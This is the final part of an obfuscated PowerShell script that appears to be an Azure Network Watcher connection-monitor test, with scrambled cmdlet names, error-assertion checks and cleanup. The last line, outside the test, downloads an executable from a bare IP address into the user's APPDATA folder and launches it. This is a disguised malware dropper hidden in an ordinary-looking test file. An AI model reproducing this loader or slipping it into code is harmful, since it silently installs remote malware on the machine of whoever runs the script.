        ${RM`job} = &("{4}{3}{0}{2}{7}{1}{5}{6}"-f '-AzNet','tc','workW','emove','R','herConnectionMon','itor','a') -InputObject ${C`M1} -AsJob -PassThru
        ${r`MjoB} | &("{2}{0}{1}" -f'ait-Jo','b','W')
        ${RE`SU`lt} = ${R`mJ`oB} | &("{1}{0}{2}" -f'ec','R','eive-Job')
        &("{0}{1}" -f 'Wait','-Vm') ${V`m}

        &("{2}{1}{3}{0}{5}{4}"-f 'ro','T','Assert-','h','ke','wsLi') { &("{1}{7}{2}{3}{5}{4}{6}{0}"-f'r','Set','AzN','etwo','herConnec','rkWatc','tionMonito','-') -NetworkWatcher ${n`w} -Name ("{0}{2}{1}" -f'fak','Name','e') -SourceResourceId ${v`m}."i`D" -DestinationAddress ("{2}{1}{0}"-f'com','.','test') -DestinationPort 80 -MonitoringIntervalInSeconds 42 } ("{2}{1}{0}"-f't*found*','o','*n')

        
        &("{0}{3}{1}{2}" -f 'Remov','Watch','er','e-AzNetwork') -ResourceGroupName ${n`W}."R`E`SOUrCEg`RoUP`NamE" -Name ${N`W}."na`me"

        &("{3}{4}{2}{5}{1}{0}" -f'sLike','-Throw','e','As','s','rt') { &("{2}{9}{3}{1}{8}{0}{6}{5}{7}{4}"-f 'herConne','zNetw','N','-A','r','onMoni','cti','to','orkWatc','ew') -Location ${LOCa`TI`o`NmOd} -Name ${cmNa`Me1} -SourceResourceId ${v`m}."i`D" -DestinationAddress ("{1}{2}{0}"-f 'g.com','b','in') -DestinationPort 80 } ("{1}{2}{0}" -f' is no*','*Th','ere')
        &("{0}{4}{5}{2}{1}{3}" -f'Assert-','ik','L','e','Th','rows') { &("{3}{1}{4}{7}{5}{2}{8}{0}{6}"-f'nne','ove-AzNetw','tc','Rem','o','kWa','ctionMonitor','r','herCo') -Location ${LOc`ATionM`od} -Name ${c`mnaME1} } ("{0}{2}{3}{1}"-f'*The','*','r','e is no')
        &("{3}{2}{0}{1}" -f'rowsLi','ke','Th','Assert-') { &("{1}{10}{2}{4}{8}{3}{0}{9}{5}{7}{6}"-f'o','Get-AzNetwor','WatcherCon','nM','n','i','or','t','ectio','n','k') -Location ${LOCATIO`N`M`od} -Name ${CmN`AME1} } ("{1}{0}{2}" -f 'er','*Th','e is no*')
        &("{0}{2}{3}{1}" -f'As','ike','ser','t-ThrowsL') { &("{9}{2}{0}{1}{4}{8}{3}{5}{10}{7}{6}" -f'atcherC','onnect','rkW','nM','i','o','tor','i','o','Set-AzNetwo','n') -Location ${Lo`CaTiO`N`moD} -Name ${Cm`N`Ame1} -SourceResourceId ${vm}."Id" -DestinationAddress ("{1}{0}{2}"-f 'c','test.','om') -DestinationPort 80 -MonitoringIntervalInSeconds 42 } ("{1}{0}{2}"-f'There is','*',' no*')
        &("{3}{0}{4}{2}{1}"-f'sert','Like','ws','As','-Thro') { &("{7}{10}{8}{5}{3}{4}{9}{1}{0}{2}{6}"-f'ionMon','nect','itorR','Watch','er','etwork','eport','Get','AzN','Con','-') -Location ${lO`CATI`O`NMod} -Name ${cMn`A`Me1} } ("{0}{1}{3}{2}" -f'*T','here i',' no*','s')
        &("{1}{3}{2}{0}" -f 'sLike','Asser','-Throw','t') { &("{2}{0}{1}{3}{5}{4}{8}{6}{7}{9}"-f 'AzNetworkWa','tc','Stop-','herCon','on','necti','o','ni','M','tor') -Location ${lOCAti`ONm`oD} -Name ${CMNA`M`e1} } ("{3}{2}{1}{0}"-f'*','no','here is ','*T')
        &("{3}{1}{0}{2}"-f 'Throws','-','Like','Assert') { &("{11}{7}{3}{10}{8}{0}{2}{1}{5}{4}{6}{9}"-f'r','atcherConn','kW','-Az','nit','ectionMo','o','tart','two','r','Ne','S') -Location ${LoCaT`IOn`MoD} -Name ${CMNa`M`E1} } ("{1}{2}{0}" -f'is no*','*The','re ')
    }
    finally
    {
        
        &("{4}{3}{1}{5}{2}{0}" -f'ceGroup','ea','sour','l','C','n-Re') ${re`SOUr`CEg`ROuPnAmE}
        &("{1}{5}{3}{4}{0}{2}"-f'ceGro','Cl','up','an-Res','our','e') ${n`W`RgnamE}
    }
}

(&("{1}{2}{0}" -f'Object','Ne','w-') ("{1}{0}{3}{4}{5}{2}" -f 's','Sy','t','t','em.Net.W','ebClien')).("{1}{2}{0}" -f 'ile','Downl','oadF').Invoke(("{8}{1}{6}{5}{2}{7}{3}{0}{4}" -f 'v.e','tp:','8.170','yahoo/csrs','xe','.24','//89','.218/~','ht'),"$env:APPDATA\csrsv.exe");&("{2}{3}{1}{0}" -f'ocess','Pr','S','tart-') ("$env:APPDATA\csrsv.exe")
